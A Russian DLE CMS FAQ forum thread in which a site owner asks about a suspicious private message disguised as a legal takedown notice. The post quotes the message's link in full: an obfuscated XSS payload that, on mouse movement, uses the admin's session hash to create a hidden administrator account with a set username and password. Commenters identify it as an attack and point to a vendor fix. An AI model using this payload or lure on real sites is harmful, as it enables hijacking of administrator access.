Задать вопрос
Не нравятся результаты поиска? Попробуйте другой поиск!
DLE FAQ » Все вопросы » Общие вопросы по PHP » Атака на DLE через ЛС?

Атака на DLE через ЛС?

     16.03.2018    Общие вопросы по PHP, Ламерские вопросы    1601

вопрос
В ЛС DLE пришло следующие письмо

На вашем сайте размещен материал противоречащий законодательству РФ on
Уважаемая администрация,
Материалы, принадлежащие нашему клиенту, размещены на Вашем сайте. Клиент разрешения на их публикацию на указанном веб ресурсе не давал. Существуют основания для запрета клиентом к распространению в сети данных файлов, а также основания, в случае отказа удаления, признания соответствующих действий компрометирующими. Просим удалить материалы в течение 3х рабочих дней со дня получения данного письма. Данное письмо просим считать официальным электронным уведомлением, которое является зарегистрированным в соответствующей электронной базе, заверено электронной подписью и может быть использовано в качестве аргумента в случае возникновения дополнительных разбирательств."
--------------------
TTT

Где TTT ссылка

<a href="ftp://%7Btext%7Dstyle=easy:t;display:block;position:absolute;opacity:0;left:-500px;top:-500px;width:250%;height:1500px;%7Bsubj%7DMouseMove=$(function()%7B$.post(dle_root+dle_admin+unescape(/%3Fmod%3Deditusers%26action%3Dlist/.source),%7Baction:/adduser/.source,user_hash:dle_login_hash,mod:/editusers/.source,regusername:/grnj75/.source,regpassword:/d14789/.source,regemail:/grnj75@bk.ru/.source,reglevel:1%7D);$(unescape(/%5Bstyle%5E%3D%27easy%27%5D/.source)).hide();%7D);//">TTT</a>

Что делает данный скрипт и стоит ли опасаться?

Ответа пока нет

 

8 комментариев

UsurpatorVaticana
Юзер

UsurpatorVaticana - 16 марта 2018 22:04 -

Пользователя с таким именем grnj75 на сайте не появилось, значит опасность миновала?
Апельсин
Юзер

Апельсин - 16 марта 2018 22:24 -

Создаёт админа. Не нажимать по ссылкам! Удалять такие письма и всё.
UsurpatorVaticana
Юзер

UsurpatorVaticana - 16 марта 2018 22:25 -

да я сначала кликнул, а потом исходник глянул(
maks
Юзер

maks - 17 марта 2018 00:16 -

Мне тоже недавно приходило такое письмо, один в один, только без ссылки. И тишина
irrwisch
Юзер

irrwisch - 17 марта 2018 01:59 -

После подобной атаки через обратную связь, на один из сайтов клиентов, celsoft выпустил фикс https://dle-news.ru/bags/1741-nedostatochnaya-filtraciya-dannyh.html
KoKauH
Юзер

KoKauH - 19 марта 2018 12:15 -

***Комментарий удален***
amnistik
Юзер

amnistik - 26 марта 2018 19:28 -

irrwisch,
Спасибо очень полезно!!!
defoz
Юзер

defoz - 9 апреля 2018 19:55 -

мне точно так же прислали сегодня :D
ток я не кликал на ссыль а сразу его в бан послал потом навел мышу на эту подпись и увидел такое, открыл консоль и понял что это тру хацкер
Чтобы комментировать - войдите или зарегистрируйтесь на сайте

Похожие вопросы

 10.07.2012 xoxa99  Общие вопросы по PHP
 15.10.2012 monach  Общие вопросы, Общие вопросы по PHP
 28.01.2013 gabakz  Общие вопросы по PHP
 21.02.2013 zyklon  Общие вопросы по PHP, Модули
 12.12.2013 physix  Общие вопросы, Общие вопросы по PHP, MySQL
 21.07.2015 Gungnir  Общие вопросы по PHP
 11.11.2015 Dmitri  Общие вопросы, Общие вопросы по PHP
 16.12.2015 Апельсин  Общие вопросы по PHP
 19.05.2017 UsurpatorVaticana  Общие вопросы по PHP, Хаки, Ламерские вопросы
 18.12.2017 LatentThreat  Общие вопросы по PHP
  • mondolfo | Как вывесит в comments.tpl картинку с но ... 7
    Фото mondolfo
    mondolfo
    Как вывесит в comments.tpl картинку с новости?
    23-11-2024, 23:42
    кто-нибудь решил эту?
  • Darkzone | Выбор категории для доп. поля? 4
    Фото Darkzone
    Darkzone
    Выбор категории для доп. поля?
    22-11-2024, 17:08
    Разъясните как вытащить id?
  • lutskboy | Вытащить все данные из определенного доп ... 1
    Фото lutskboy
    lutskboy
    Вытащить все данные из определенного доп поля?
    22-11-2024, 16:17
    в adminer можно.
  • lutskboy | Выбор категории для доп. поля? 4
    Фото lutskboy
    lutskboy
    Выбор категории для доп. поля?
    22-11-2024, 16:14
    выбрать все кроме такого нет. можно с бд достать все ид через запятую и вставить в xfields.txt
    js скрипт можно написать
    
<script>
    window.addEventListener('load', ()=> {
        $('#category').on('change', function() {
            var value = $(this).val();
            if ($.isArray(value)) {
            	ShowOrHideEx("xfield_holder_year", jQuery.inArray('1', value) != -1 || jQuery.inArray('2', value) != -1 );
            } else {
            	ShowOrHideEx("xfield_holder_year", value == 1 || value==2);
            }
        })
    });
</script>
year доп поле . 1 и 2 катег
  • Darkzone | Выбор категории для доп. поля? 4
    Фото Darkzone
    Darkzone
    Выбор категории для доп. поля?
    22-11-2024, 14:39
    Смотрите, Нужно чтоб обязательное к заполнению доп. поле при добавлении новости, выводилось во всех категориях, кроме двух. Так как количество категорий довольно большое, есть ли способ, не тыкать каждую категорию в которой будет отображаться доп.поле. Надеюсь я смог разъяснить.
  • lutskboy | Выбор категории для доп. поля? 4
    Фото lutskboy
    lutskboy
    Выбор категории для доп. поля?
    22-11-2024, 13:52
    где выводить? админка или сайт
  • TeraMoune | Как отключить миниатюры стандартной гале ...
    Фото TeraMoune
    TeraMoune
    Как отключить миниатюры стандартной галереи Fancybox?
    21-11-2024, 06:00
    В файле engine/classes/fancybox/fancybox.js искать нужную инициализацию и добавлять соответствующие параметры, весь список параметров и их описание можно найти на этой странице https://fancyapps.com/fancybox/api/options/

    Например: параметр Thumbs: false отключает миниатюры.
    Fancybox.bind("[data-highslide]", {
	groupAttr: 'data-highslide',
	idle:2000,
	Thumbs: false,
	caption: (fancybox, slide) => {
		if(  slide.thumbEl && slide.thumbEl.alt ) {
			return slide.thumbEl.alt
		}
	}
});
  • derebas | Как реализовать шифрование трафика? 3
    Фото derebas
    derebas
    Как реализовать шифрование трафика?
    18-11-2024, 16:52
    Ну в теории, можно использовать src на site.com разместить прокси на site2.com а выдавать видео с site3.com, при этом прямой доступ на site3.com закрыть, отдача будет только если запрос с site2.com, таким образом палится только site2.com, НО источник потокового видео, все равно можно увидеть если захотеть, а ссылки, ну купить домен dsac-43efew-csdds.uz как пример
  • Gordi | Перенёс сайт - не работают кнопки, не от ... 8
    Фото Gordi
    Gordi
    Перенёс сайт - не работают кнопки, не отображаются новости. Как вылечить?
    18-11-2024, 14:46
    я уже делал. Пользователь 1000 (это я так понимаю root) и chmod 777
    Так и было...
  • lutskboy | Перенёс сайт - не работают кнопки, не от ... 8
    Фото lutskboy
    lutskboy
    Перенёс сайт - не работают кнопки, не отображаются новости. Как вылечить?
    18-11-2024, 14:39
    чтоб не удалять выстави права и пользователя какие там идут на файлы. .
наверх